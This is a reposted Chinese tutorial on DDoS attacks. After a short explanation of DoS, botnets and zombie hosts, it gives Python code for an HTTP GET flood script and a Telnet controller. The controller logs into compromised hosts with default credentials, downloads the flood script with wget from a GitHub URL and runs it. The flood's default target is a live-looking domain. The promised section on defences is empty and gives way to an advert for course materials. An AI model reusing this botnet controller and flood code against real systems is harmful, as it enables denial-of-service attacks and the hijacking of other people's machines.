自学内容网 自学内容网

什么是DDoS攻击?

什么是DDoS攻击?

拒绝服务(Denial-of-Service,DoS)攻击是一种针对某些服务可用性的攻击。
通过耗尽CPU、内存、带宽以及磁盘空间等系统资源,来阻止或削弱对网络、系统或应用程序的授权使用的行为。

如果攻击者采用单一主机攻击,那么这种泛洪攻击的效果会受到攻击系统上所能产生的网络流量总量的限制。而且单一的攻击系统也会使得攻击者容易被跟踪。通过使用多个主机,攻击者可以显著的扩大攻击中的数据包数量,而且多个主机中的任何一台系统都不需要很高的性能或处于很高容量的链路。DDoS 攻击是 DoS 攻击的升级,具有巨大的威胁性。

攻击者通过某些常用应用程序的漏洞来获得访问这些系统的权限,并安装自己的程序。这些被入侵的主机系统称为僵尸主机。一旦僵尸主机被安装上合适的后门程序,那么就会完全处在攻击者的控制下。攻击者控制的大量僵尸主机组合在一起就形成一个僵尸网络。DDoS攻击由此展示出真正的威力!!! 

DDoS的常见形式

传输层:SYN DDoS --> SYN DoS --> SYN Flooding

应用层:HTTP DDoS --> GET/POST DoS --> GET/POST Flooding

接下来咱们一起来看看应用层的典型DDoS攻击!!!

HTTP DDoS攻击的设计与实现

DDoS Bate 0.1版本

实验环境:
主机:kali rolling
肉鸡:ubuntu虚拟机 启动Telnet服务 安装python3
控制器程序:负责控制肉鸡 下载DoS程序
DoS程序:持续发送HTTP GET请求 消耗服务器资源

本文仅仅以网络安全实验探索的角度 在虚拟机中模拟实现DDoS攻击

 DoS程序:

#dos.py
import http.client
import time

class Dos(object):
    def __init__(self):
        pass

    def httpGetFlood(self,sleepTime,servAddr,url):
        for i in range(2):
            time.sleep(sleepTime)
            try:
                conn = http.client.HTTPConnection(servAddr)
                conn.request('GET',url)
                r1 = conn.getresponse()
                print(r1.status,r1.reason)
                conn.close()
            except IOError as e:
                print("except:",e)
            finally:
                print("httpGetFlood END")

    def httpGetNormal(self,sleepTime,servAddr,url):
        for i in range(2):
            sleep(sleepTime)
            try:
                conn0 = http.client.HTTPConnection(servAddr)
                conn0.request('GET',url)
                r0 = conn0.getresponse()
                flag = 0
                if r0.status == 307:
                    flag = 1
                    conn0.close()
                    conn1 = http.client.HTTPConnection(servAddr)
                    url = r0.getheaders()[1][1]
                    print(url)
                    conn1.request('GET',url)
                    r1 = conn1.getresponse()
                    print(r1.status)
                    conn1.close()
                if flag == 0:
                    conn0.close()
            except IOError as e:
                print(e)
            finally:
                print("httpGetNormal END")



if __name__ == '__main__':
    servAddr = "hackbiji.top"
    url = "/"
    sleepTime = 0.1
    hack = Dos()
    hack.httpGetFlood(sleepTime,servAddr,url)

控制器程序:

#trigger.py
import telnetlib
import time
import re
class Trigger(object):
    def __init__(self):
        pass

    def login(self,Host,username=b'root',passwd=b'root'):
        dev = telnetlib.Telnet(Host,port=23)
        dev.set_debuglevel(2) #Debug mode

        dev.read_until(b'login:')
        dev.write(username + b'\n')

        dev.read_until(b'Password:')
        dev.write(passwd + b'\n')
        dev.read_until(b'$')
        return dev

    def checkIN(self,dev):
        fileisIN = False
        dev.write(b'ls'+b'\n')
        buff = dev.read_until(b'$')
        buff = str(buff,encoding='utf-8')
        matched = re.search(r'\bdos.py\b', buff, re.M)
        if matched:
            fileisIN = True
        return fileisIN

    def dosDownLoad(self,dev,path):
        dev.write(b'cd ~' + b'\n')

        dev.read_until(b'$')
        dev.write(b'wget '+ path + b'\n')
        dev.read_until(b'$')

    def dosAction(self,dev):
        dev.write(b'python3 dos.py' + b'\n')
        dev.read_until(b'$')

    def signout(self,dev):
        telnetlib.Telnet.close(dev)

if __name__ == '__main__':
    Host=b'192.168.59.146'
    username = b'gu'
    passwd = b'gu'
    path = b'https://raw.githubusercontent.com/isGt93/isGt93.github.io/source/source/_posts/%E9%BB%91%E5%AE%A2%E7%AC%94%E8%AE%B0-DDOS%E5%85%A5%E9%97%A8/dos.py'
    hack = Trigger()
    dev = hack.login(Host,username,passwd)
    if not hack.checkIN(dev):
        hack.dosDownLoad(dev,path)
    time.sleep(2)
    hack.dosAction(dev)
    hack.signout(dev)

HTTP DDoS攻击的防范手段

如果你也想学习:黑客&网络安全的SQL攻防
在这里领取:
这个是我花了几天几夜自整理的最新最全网安学习资料包免费共享给你们,其中包含以下东西:
1.学习路线&职业规划

在这里插入图片描述
在这里插入图片描述

2.全套体系课&入门到精通

在这里插入图片描述

3.黑客电子书&面试资料

在这里插入图片描述

 


原文地址:https://blog.csdn.net/HackKong/article/details/135775993

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!